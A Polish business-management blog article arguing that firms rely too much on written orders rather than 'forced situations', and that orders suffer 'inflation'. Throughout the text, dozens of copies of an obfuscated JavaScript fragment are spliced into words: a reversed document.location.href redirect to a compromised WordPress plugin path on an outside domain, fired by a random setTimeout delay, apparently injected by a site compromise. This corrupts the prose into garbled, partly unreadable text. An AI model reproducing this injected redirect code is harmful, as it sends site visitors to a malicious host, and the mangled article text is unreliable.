In Artykuły, Handel, Uniwersalne

W zarządzaniu firmą chodzi o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby pracownicy robili toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, na czym jej zależy. Częs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to też na tym, żeby toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to robili tylko w określony sposób. Można toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to uzyskać na kilka różnych sposobów, z których zarządzanie jest tylko jednym z kilku. I w warunkach organizacji rozproszonej, gdzie trudno o lojalność szybko wymieniających się pracowników, trudno też o profesjonalnych menedżerów (małych placówek nie stać na ich zatrudnienie). A takie właśnie są zwykle organizacje handlowe.

W takiej sytuacji lepiej postawić na inne sposoby osiągnięcia celu, jakim są pożądane zachowania. Można sięgnąć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do sytuacji przymusowych ( toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jednak wymaga toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dos toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowania infrastruktury biznesowej na poziomie Modelu Biznesowego). Ale można też sięgnąć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do zarządzeń. To próba stworzenia takich sytuacji przymusowych, tyle że nie infrastrukturą, tylko słowami.

Uwaga. „aparat kontroli”. Zwykle zarządzenia kojarzą się z regulacjami. A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to duże uproszczenie. Powinny bowiem tak samo kojarzyć się z aparatem kontroli, jaki zawsze będzie niezbędny, aby toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopilnować ich przestrzegania. A taki aparat jest kosz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towny, czasem równie kosz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towny, jak profesjonale zarządzanie. A na pewno może być toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to koszt porównywalny z kosztem stworzenia sytuacji przymusowych.

Sposoby na wymuszenie pożądanych zachowań w organizacji.

Zarządzenia mogą być tanim (toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopasowanie infrastruktury zwykle jest kosz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towne) sposobem na wymuszenie pożądanych zachowań. Ale nie można przesadzić. Dopóki regulują tylko wybrane i nieliczne obszary, może się udać. Jeśli jednak (a taka jest zwykle ich dynamika) próbują ogarnąć wszystkie obszary firmy, skończy się niepowodzeniem. Gdyż zarządzenia, tak jak ceny, podlegają inflacji.

Uwaga. „a inicjatywa?” Czy jednak firmie nie jest potrzebna inicjatywa pracowników? Jest jej potrzeba jak najbardziej, ale rzadko sobie z tego zdaje sprawę. Zwykle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dominuje postawa – „wiemy jak, wy macie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tylko zrobić”. Tak właśnie rodzi się zarzadzanie zarządzeniami, które z definicji dławi inicjatywę.

Sytuacje przymusowe

To najlepszy sposób na zarządzanie, niestety nie zawsze możliwy. Ale jeśli możliwy, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najbardziej skuteczny i toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to od niego war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zawsze zacząć.

Tak działają sytuacje przymusowe. One wymuszają zachowania, nie dlatego, że są słuszne i pożądane ( toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to robi zarządzanie), ale dlatego, że inaczej się nie da. Jeśli punkt obsługi klienta jest w przejściu, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrze witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doczny i oznakowany, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie da się nie obsługiwać. Nawet jeśli sprzedawca tego nie chce czy się z tym nie zgadza. Ale nie ma innego wyjścia. Tak samo (może trochę słabiej) działa witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doczny strój czy lokalizacja miejsca pracy (np. składania zamówień). Tu pracownik jest między „młotem i kowadłem”. A raczej między wymuszającą zachowania infrastrukturą biznesową (twarde elementy Konceptu) a procedurami (elementy miękkie).

Uwaga. „rola IT w sytuacjach przymusowych”. System komputerowy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jeden z najskuteczniej działających sposobów na stworzenie sytuacji przymusowej. Tu łatwo można wymusić pożądane zachowanie, tylko dlatego, że inaczej się nie da. Trzeba jednak uważać. Takie jego działanie powoduje sprzeciw. I poszukiwanie sposobu, w jaki można go obejść czy oszukać. Wtedy wydaje się, że pracownik jest skrępowany, pozornie wszystko wygląda zgodnie z oczekiwaniami, ale pod tym pozorem kryją się zachowania wręcz sprzeczne z interesem firmy.

Zarządzanie

Tak działa zarządzanie. A przynajmniej zarządzanie zgodne z interesem firmy.

Zarządzenia

To droga na skróty. Wielu myli zarządzanie z zarządzeniami. A konsekwencją tego jest znana z gospodarki inflacja.

Zarządzenia nie są niczym innym jak próba stworzenia systemu ograniczeń, ale nie infrastrukturalnie, jak toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to było w pierwszym przypadku. Tylko słowami i ewentualnymi karami za ich nie przestrzeganie.

Uwaga. „aparat kontroli”. Zarządzanie przez zarządzenia wymaga stworzenia aparatu kontroli (inaczej zarządzenia pozostaną tylko na papierze). Taki aparat jednak drogo kosztuje, ale też bardzo „usztywnia” organizację i czyni ją mało elastyczną. Przestrzeganie zasad staje się ważniejsze niż sprzedaż, sukces czy ren toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towność.

Me toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toda zarządzania zarządzeniami jest kusząca. Ale i wciągająca. Pojawia się pokusa regulowania w ten sposób wszystkich obszarów. Próba uregulowania wszystkich obszarów przedsiębiorstwa zawsze kończy się tak samo. Inflacją. Zarządzenia nie będą już działały, choć nie tylko dlatego, że ich skuteczność jest mniejsza niż skuteczność sytuacji przymusowych. Ale też dlatego, że nie wiatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domo, co jest ważniejsze, a przecież wszystkiego, szczególnie na raz, na pewno nie da się zrobić.

Inflacja zarządzeń

Zwykle zaczyna się niewinnie. Gdzie pojawia się luka w zachowaniach firmy, a ewentualne stworzenie sytuacji przymusowej może okazać się drogie, trudne, a czasem wręcz niewykonalne. I panaceum okazuje się wydanie zarządzenia.

Inflacja zarządzeń oznacza ich nadmiar, zagubienie priorytetów, rozpaczliwe próby kontroli wszystkich i wszystkiego. Ale i tak się nie uda, inflacja jest tu nieubłagana.

Podsumowanie

Zarządzanie przedsiębiorstwem przy pomocy zarządzeń toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to duża pokusa. Wydaje się, że toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sposób, aby organizacja zachowywała się zgodnie z oczekiwaniami. Sposób łatwy i wygodny (dla wydającego zarządzenia), pozornie też skuteczny. I jeśli zarządzeń jest niewiele, może tak właśnie być. Ale jeśli pojawi się pokusa (raczej nie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do uniknięcia), żeby uregulować wszystko, skończy się inflacją. Nie będzie wiatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domo, co tak naprawdę obowiązuje i co jest ważniejsze (a coś trzeba przecież wybrać).

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.